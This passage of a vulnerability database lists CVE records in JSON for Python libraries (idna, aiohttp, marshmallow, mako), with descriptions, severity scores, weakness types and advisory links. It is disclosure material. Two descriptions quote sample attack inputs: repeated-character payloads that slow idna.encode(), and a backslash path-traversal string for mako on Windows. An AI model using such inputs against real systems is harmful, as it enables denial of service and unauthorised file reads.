"role": "CISA Coordinator",
"timestamp": "2026-06-08T14:30:54.406761Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-08T16:34:00.295Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "idna",
"vendor": "kjd",
"versions": [
{
"status": "affected",
"version": "\u003c 3.15"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Internationalized Domain Names in Applications (IDNA) for Python provides support for Internationalized Domain Names in Applications (IDNA) and Unicode IDNA Compatibility Processing. In versions prior to 3.15, payloads such as `\"\\u0660\" * N` or `\"\\u30fb\" * N + \"\\u6f22\"` utilize the `valid_contexto` function prior to length rejection, and for high values of `N` will take a long time to process. This is the same issue as CVE-2024-3651, however the original remediation in 2024 was not a complete fix. A specially crafted argument to the `idna.encode()` function could consume significant resources. This may lead to a denial-of-service. Starting in version 3.14, the function rejects long inputs as soon as practicable prior to any further processing to minimize resource consumption. In version 3.15, this approach was extended to lesser used alternate functions (i.e. per-label conversions and codec support). A workaround is available. Domain names cannot exceed 253 characters in length. If this length limit is enforced prior to passing the domain to the `idna.encode()` function, it should no longer consume significant resources. This is triggered by arbitrarily large inputs that would not occur in normal usage, but may be passed to the library assuming there is no preliminary input validation by the higher-level application."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1333",
"description": "CWE-1333: Inefficient Regular Expression Complexity",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-05T22:06:07.082Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/kjd/idna/security/advisories/GHSA-65pc-fj4g-8rjx",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/kjd/idna/security/advisories/GHSA-65pc-fj4g-8rjx"
}
],
"source": {
"advisory": "GHSA-65pc-fj4g-8rjx",
"discovery": "UNKNOWN"
},
"title": "Internationalized Domain Names in Applications (IDNA): Specially crafted inputs to idna.encode() can bypass CVE-2024-3651 fix"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-45409",
"datePublished": "2026-06-05T22:06:07.082Z",
"dateReserved": "2026-05-12T01:48:40.452Z",
"dateUpdated": "2026-06-08T16:34:00.295Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-52304 (GCVE-0-2024-52304)
Vulnerability from cvelistv5 – Published: 2024-11-18 20:12 – Updated: 2025-11-03 20:45- CWE-444 - Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:python:aiohttp:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "aiohttp",
"vendor": "python",
"versions": [
{
"lessThan": "3.10.11",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-52304",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-11-19T15:38:44.530052Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-11-21T14:07:39.914Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-03T20:45:25.646Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "https://lists.debian.org/debian-lts-announce/2025/02/msg00002.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "aiohttp",
"vendor": "aio-libs",
"versions": [
{
"status": "affected",
"version": "\u003c 3.10.11"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.10.11, the Python parser parses newlines in chunk extensions incorrectly which can lead to request smuggling vulnerabilities under certain conditions. If a pure Python version of aiohttp is installed (i.e. without the usual C extensions) or `AIOHTTP_NO_EXTENSIONS` is enabled, then an attacker may be able to execute a request smuggling attack to bypass certain firewalls or proxy protections. Version 3.10.11 fixes the issue."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "LOW"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-444",
"description": "CWE-444: Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-18T20:12:48.612Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-8495-4g3g-x7pr",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-8495-4g3g-x7pr"
},
{
"name": "https://github.com/aio-libs/aiohttp/commit/259edc369075de63e6f3a4eaade058c62af0df71",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/commit/259edc369075de63e6f3a4eaade058c62af0df71"
}
],
"source": {
"advisory": "GHSA-8495-4g3g-x7pr",
"discovery": "UNKNOWN"
},
"title": "aiohttp vulnerable to request smuggling due to incorrect parsing of chunk extensions"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-52304",
"datePublished": "2024-11-18T20:12:48.612Z",
"dateReserved": "2024-11-06T19:00:26.396Z",
"dateUpdated": "2025-11-03T20:45:25.646Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68480 (GCVE-0-2025-68480)
Vulnerability from cvelistv5 – Published: 2025-12-22 21:20 – Updated: 2025-12-22 21:35- CWE-405 - Asymmetric Resource Consumption (Amplification)
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
| Vendor | Product | Version | ||
|---|---|---|---|---|
| marshmallow-code | marshmallow |
Affected:
>= 3.0.0rc1, < 3.26.2
Affected: >= 4.0.0, < 4.1.2 |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-68480",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-12-22T21:34:43.372078Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-12-22T21:35:02.469Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "marshmallow",
"vendor": "marshmallow-code",
"versions": [
{
"status": "affected",
"version": "\u003e= 3.0.0rc1, \u003c 3.26.2"
},
{
"status": "affected",
"version": "\u003e= 4.0.0, \u003c 4.1.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Marshmallow is a lightweight library for converting complex objects to and from simple Python datatypes. In versions from 3.0.0rc1 to before 3.26.2 and from 4.0.0 to before 4.1.2, Schema.load(data, many=True) is vulnerable to denial of service attacks. A moderately sized request can consume a disproportionate amount of CPU time. This issue has been patched in version 3.26.2 and 4.1.2."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-405",
"description": "CWE-405: Asymmetric Resource Consumption (Amplification)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-12-22T21:20:15.958Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/marshmallow-code/marshmallow/security/advisories/GHSA-428g-f7cq-pgp5",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/marshmallow-code/marshmallow/security/advisories/GHSA-428g-f7cq-pgp5"
},
{
"name": "https://github.com/marshmallow-code/marshmallow/commit/d24a0c9df061c4daa92f71cf85aca25b83eee508",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/marshmallow-code/marshmallow/commit/d24a0c9df061c4daa92f71cf85aca25b83eee508"
}
],
"source": {
"advisory": "GHSA-428g-f7cq-pgp5",
"discovery": "UNKNOWN"
},
"title": "Marshmallow has DoS in Schema.load(many)"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-68480",
"datePublished": "2025-12-22T21:20:15.958Z",
"dateReserved": "2025-12-18T18:29:07.309Z",
"dateUpdated": "2025-12-22T21:35:02.469Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-34516 (GCVE-0-2026-34516)
Vulnerability from cvelistv5 – Published: 2026-04-01 20:13 – Updated: 2026-04-04 03:11- CWE-770 - Allocation of Resources Without Limits or Throttling
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2026-34516",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-04T03:11:32.193097Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-04T03:11:58.583Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "aiohttp",
"vendor": "aio-libs",
"versions": [
{
"status": "affected",
"version": "\u003c 3.13.4"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.13.4, a response with an excessive number of multipart headers may be allowed to use more memory than intended, potentially allowing a DoS vulnerability. This issue has been patched in version 3.13.4."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770: Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-01T20:13:04.893Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-m5qp-6w8w-w647",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-m5qp-6w8w-w647"
},
{
"name": "https://github.com/aio-libs/aiohttp/commit/8a74257b3804c9aac0bf644af93070f68f6c5a6f",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/commit/8a74257b3804c9aac0bf644af93070f68f6c5a6f"
},
{
"name": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"
}
],
"source": {
"advisory": "GHSA-m5qp-6w8w-w647",
"discovery": "UNKNOWN"
},
"title": "AIOHTTP: Multipart Header Size Bypass"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-34516",
"datePublished": "2026-04-01T20:13:04.893Z",
"dateReserved": "2026-03-30T16:03:31.047Z",
"dateUpdated": "2026-04-04T03:11:58.583Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-34514 (GCVE-0-2026-34514)
Vulnerability from cvelistv5 – Published: 2026-04-01 20:09 – Updated: 2026-04-02 14:07- CWE-113 - Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-34514",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-02T14:07:10.534383Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-02T14:07:17.671Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "aiohttp",
"vendor": "aio-libs",
"versions": [
{
"status": "affected",
"version": "\u003c 3.13.4"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.13.4, an attacker who controls the content_type parameter in aiohttp could use this to inject extra headers or similar exploits. This issue has been patched in version 3.13.4."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 2.7,
"baseSeverity": "LOW",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "LOW"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-113",
"description": "CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers (\u0027HTTP Request/Response Splitting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-01T20:09:50.936Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-2vrm-gr82-f7m5",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-2vrm-gr82-f7m5"
},
{
"name": "https://github.com/aio-libs/aiohttp/commit/9a6ada97e2c6cf1ce31727c6c9fcea17c21f6f06",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/commit/9a6ada97e2c6cf1ce31727c6c9fcea17c21f6f06"
},
{
"name": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"
}
],
"source": {
"advisory": "GHSA-2vrm-gr82-f7m5",
"discovery": "UNKNOWN"
},
"title": "AIOHTTP: CRLF injection in multipart part content type header construction"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-34514",
"datePublished": "2026-04-01T20:09:50.936Z",
"dateReserved": "2026-03-30T16:03:31.047Z",
"dateUpdated": "2026-04-02T14:07:17.671Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-44307 (GCVE-0-2026-44307)
Vulnerability from cvelistv5 – Published: 2026-05-12 21:53 – Updated: 2026-05-13 15:00- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
| Vendor | Product | Version | ||
|---|---|---|---|---|
| sqlalchemy | mako |
Affected:
< 1.3.12
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-44307",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-13T14:57:34.308791Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-13T15:00:13.642Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "mako",
"vendor": "sqlalchemy",
"versions": [
{
"status": "affected",
"version": "\u003c 1.3.12"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Mako is a template library written in Python. Prior to 1.3.12, on Windows, a URI using backslash traversal (e.g. \\..\\..\\ secret.txt) bypasses the directory traversal check in Template.__init__ and the posixpath-based normalization in TemplateLookup.get_template(), allowing reads of files outside the configured template directory. This vulnerability is fixed in 1.3.12."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-12T21:53:52.826Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/sqlalchemy/mako/security/advisories/GHSA-2h4p-vjrc-8xpq",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/sqlalchemy/mako/security/advisories/GHSA-2h4p-vjrc-8xpq"
},
{
"name": "https://github.com/sqlalchemy/mako/issues/435",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/sqlalchemy/mako/issues/435"
},
{
"name": "https://github.com/sqlalchemy/mako/commit/72e10c573ca0fbcbddd4455abca8ce92a61780d7",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/sqlalchemy/mako/commit/72e10c573ca0fbcbddd4455abca8ce92a61780d7"
},
{
"name": "https://github.com/sqlalchemy/mako/releases/tag/rel_1_3_12",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/sqlalchemy/mako/releases/tag/rel_1_3_12"
}
],
"source": {
"advisory": "GHSA-2h4p-vjrc-8xpq",
"discovery": "UNKNOWN"
},
"title": "Mako: Path traversal via backslash URI on Windows in TemplateLookup"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-44307",
"datePublished": "2026-05-12T21:53:52.826Z",
"dateReserved": "2026-05-05T19:00:06.021Z",
"dateUpdated": "2026-05-13T15:00:13.642Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-34519 (GCVE-0-2026-34519)
Vulnerability from cvelistv5 – Published: 2026-04-01 20:26 – Updated: 2026-04-02 15:40- CWE-113 - Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-34519",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-02T15:40:04.565929Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-02T15:40:13.945Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "aiohttp",
"vendor": "aio-libs",
"versions": [
{
"status": "affected",
"version": "\u003c 3.13.4"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.13.4, an attacker who controls the reason parameter when creating a Response may be able to inject extra headers or similar exploits. This issue has been patched in version 3.13.4."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 2.7,
"baseSeverity": "LOW",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "LOW"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-113",
"description": "CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers (\u0027HTTP Request/Response Splitting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-01T20:26:25.553Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-mwh4-6h8g-pg8w",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-mwh4-6h8g-pg8w"
},
{
"name": "https://github.com/aio-libs/aiohttp/commit/53b35a2f8869c37a133e60bf1a82a1c01642ba2b",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/commit/53b35a2f8869c37a133e60bf1a82a1c01642ba2b"
},
{
"name": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"
}
],
"source": {
"advisory": "GHSA-mwh4-6h8g-pg8w",
"discovery": "UNKNOWN"
},
"title": "AIOHTTP: HTTP response splitting via \\r in reason phrase"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-34519",
"datePublished": "2026-04-01T20:26:25.553Z",
"dateReserved": "2026-03-30T16:03:31.047Z",
"dateUpdated": "2026-04-02T15:40:13.945Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-34518 (GCVE-0-2026-34518)
Vulnerability from cvelistv5 – Published: 2026-04-01 20:15 – Updated: 2026-04-02 14:06- CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-34518",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-02T14:05:59.511898Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-02T14:06:07.930Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "aiohttp",
"vendor": "aio-libs",
"versions": [
{
"status": "affected",
"version": "\u003c 3.13.4"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.13.4, when following redirects to a different origin, aiohttp drops the Authorization header, but retains the Cookie and Proxy-Authorization headers. This issue has been patched in version 3.13.4."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 2.7,
"baseSeverity": "LOW",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-200",
"description": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-01T20:15:22.426Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-966j-vmvw-g2g9",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-966j-vmvw-g2g9"
},
{
"name": "https://github.com/aio-libs/aiohttp/commit/5351c980dcec7ad385730efdf4e1f4338b24fdb6",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/commit/5351c980dcec7ad385730efdf4e1f4338b24fdb6"
},
{
"name": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"
}
],
"source": {
"advisory": "GHSA-966j-vmvw-g2g9",
"discovery": "UNKNOWN"
},
"title": "AIOHTTP: Cookie and Proxy-Authorization headers leaked on cross-origin redirect"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-34518",
"datePublished": "2026-04-01T20:15:22.426Z",
"dateReserved": "2026-03-30T16:03:31.047Z",
"dateUpdated": "2026-04-02T14:06:07.930Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-52303 (GCVE-0-2024-52303)
